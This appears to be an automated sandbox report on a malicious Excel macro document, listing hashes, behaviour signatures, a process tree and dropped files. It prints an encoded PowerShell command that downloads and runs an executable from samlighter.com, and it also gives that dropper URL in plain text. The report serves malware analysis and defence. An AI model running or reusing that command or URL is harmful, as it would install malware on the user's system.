Analysis

  • max time kernel
    121s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    14-10-2021 05:11

General

  • Target

    NLPV.509GmbH.xlsm

  • Size

    177KB

  • MD5

    6e75c56863ea4ab6258b772bd35c6136

  • SHA1

    3936c220b3a5d2a61c4125f153e2ff60e8c17ae9

  • SHA256

    033fdf937a1c21b3c1b554193b98349d6dee6501eec1aa8fe4ed5ae703399be1

  • SHA512

    eea2fef19a8f01d61554537a3e4b9f053aab8609734fbc3b4109cf49ae66bf27a24f9a99db3bd0d268d741fb43a47dc6a180be4de843073e9a66dfca907797e8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://samlighter.com/Loveday.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Program crash 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\NLPV.509GmbH.xlsm
    1⤵
    • Deletes itself
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Xtqoeyupyktxz.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAGkAdABwAHQAZABuAHUAagBqAC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AcwBhAG0AbABpAGcAaAB0AGUAcgAuAGMAbwBtAC8ATABvAHYAZQBkAGEAeQAuAGUAeABlACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1260
        • C:\Users\Admin\AppData\Roaming\Nitptdnujj.exe
          "C:\Users\Admin\AppData\Roaming\Nitptdnujj.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 504
            5⤵
            • Loads dropped DLL
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            PID:1672

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Nitptdnujj.exe
    MD5

    da17635505ade51b161ee9779daa5745

    SHA1

    45d64021973bf6b71dc824fedf8462a066345045

    SHA256

    313a88ca25c0291e7d87528a197add849e1c1fa43fc8614b28ff3d8218f149c7

    SHA512

    1ae26011b684eaa56982849093e587e77a69c2dc27b5d821bfed7c803d436f9cca20020301f9b36c8ff946e00cd84d93ebc71f49a5a6b196be464b318bfaea6d

  • C:\Users\Admin\AppData\Roaming\Nitptdnujj.exe
    MD5

    da17635505ade51b161ee9779daa5745

    SHA1

    45d64021973bf6b71dc824fedf8462a066345045

    SHA256

    313a88ca25c0291e7d87528a197add849e1c1fa43fc8614b28ff3d8218f149c7

    SHA512

    1ae26011b684eaa56982849093e587e77a69c2dc27b5d821bfed7c803d436f9cca20020301f9b36c8ff946e00cd84d93ebc71f49a5a6b196be464b318bfaea6d

  • C:\Users\Admin\Documents\Xtqoeyupyktxz.bat
    MD5

    8af226867496ba123fb22313c29ad442

    SHA1

    a1d7796e0b3da8b329777903705a4e7c876feaf0

    SHA256

    51498059b24f063214020847174677616d8693d6653e08676c17d548d55ce820

    SHA512

    da6364c4c4eecfb4ddf72aa73d38a89f64df343b79378821edc6ea560d494f007ad8cf2151986c1c26281dfcc1faf6f7773fafac4333f495c792c6502c6984ad

  • \Users\Admin\AppData\Roaming\Nitptdnujj.exe
    MD5

    da17635505ade51b161ee9779daa5745

    SHA1

    45d64021973bf6b71dc824fedf8462a066345045

    SHA256

    313a88ca25c0291e7d87528a197add849e1c1fa43fc8614b28ff3d8218f149c7

    SHA512

    1ae26011b684eaa56982849093e587e77a69c2dc27b5d821bfed7c803d436f9cca20020301f9b36c8ff946e00cd84d93ebc71f49a5a6b196be464b318bfaea6d

  • \Users\Admin\AppData\Roaming\Nitptdnujj.exe
    MD5

    da17635505ade51b161ee9779daa5745

    SHA1

    45d64021973bf6b71dc824fedf8462a066345045

    SHA256

    313a88ca25c0291e7d87528a197add849e1c1fa43fc8614b28ff3d8218f149c7

    SHA512

    1ae26011b684eaa56982849093e587e77a69c2dc27b5d821bfed7c803d436f9cca20020301f9b36c8ff946e00cd84d93ebc71f49a5a6b196be464b318bfaea6d

  • \Users\Admin\AppData\Roaming\Nitptdnujj.exe
    MD5

    da17635505ade51b161ee9779daa5745

    SHA1

    45d64021973bf6b71dc824fedf8462a066345045

    SHA256

    313a88ca25c0291e7d87528a197add849e1c1fa43fc8614b28ff3d8218f149c7

    SHA512

    1ae26011b684eaa56982849093e587e77a69c2dc27b5d821bfed7c803d436f9cca20020301f9b36c8ff946e00cd84d93ebc71f49a5a6b196be464b318bfaea6d

  • \Users\Admin\AppData\Roaming\Nitptdnujj.exe
    MD5

    da17635505ade51b161ee9779daa5745

    SHA1

    45d64021973bf6b71dc824fedf8462a066345045

    SHA256

    313a88ca25c0291e7d87528a197add849e1c1fa43fc8614b28ff3d8218f149c7

    SHA512

    1ae26011b684eaa56982849093e587e77a69c2dc27b5d821bfed7c803d436f9cca20020301f9b36c8ff946e00cd84d93ebc71f49a5a6b196be464b318bfaea6d

  • \Users\Admin\AppData\Roaming\Nitptdnujj.exe
    MD5

    da17635505ade51b161ee9779daa5745

    SHA1

    45d64021973bf6b71dc824fedf8462a066345045

    SHA256

    313a88ca25c0291e7d87528a197add849e1c1fa43fc8614b28ff3d8218f149c7

    SHA512

    1ae26011b684eaa56982849093e587e77a69c2dc27b5d821bfed7c803d436f9cca20020301f9b36c8ff946e00cd84d93ebc71f49a5a6b196be464b318bfaea6d

  • \Users\Admin\AppData\Roaming\Nitptdnujj.exe
    MD5

    da17635505ade51b161ee9779daa5745

    SHA1

    45d64021973bf6b71dc824fedf8462a066345045

    SHA256

    313a88ca25c0291e7d87528a197add849e1c1fa43fc8614b28ff3d8218f149c7

    SHA512

    1ae26011b684eaa56982849093e587e77a69c2dc27b5d821bfed7c803d436f9cca20020301f9b36c8ff946e00cd84d93ebc71f49a5a6b196be464b318bfaea6d

  • memory/1260-60-0x0000000075BD1000-0x0000000075BD3000-memory.dmp
    Filesize

    8KB

  • memory/1260-59-0x0000000000000000-mapping.dmp
  • memory/1260-61-0x0000000002540000-0x000000000318A000-memory.dmp
    Filesize

    12.3MB

  • memory/1380-63-0x0000000000000000-mapping.dmp
  • memory/1380-66-0x00000000013C0000-0x00000000013C1000-memory.dmp
    Filesize

    4KB

  • memory/1672-68-0x0000000000000000-mapping.dmp
  • memory/1672-75-0x0000000000590000-0x00000000005B6000-memory.dmp
    Filesize

    152KB

  • memory/1796-57-0x0000000000000000-mapping.dmp
  • memory/2040-54-0x000000002F141000-0x000000002F144000-memory.dmp
    Filesize

    12KB

  • memory/2040-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2040-55-0x0000000071781000-0x0000000071783000-memory.dmp
    Filesize

    8KB

  • memory/2040-76-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB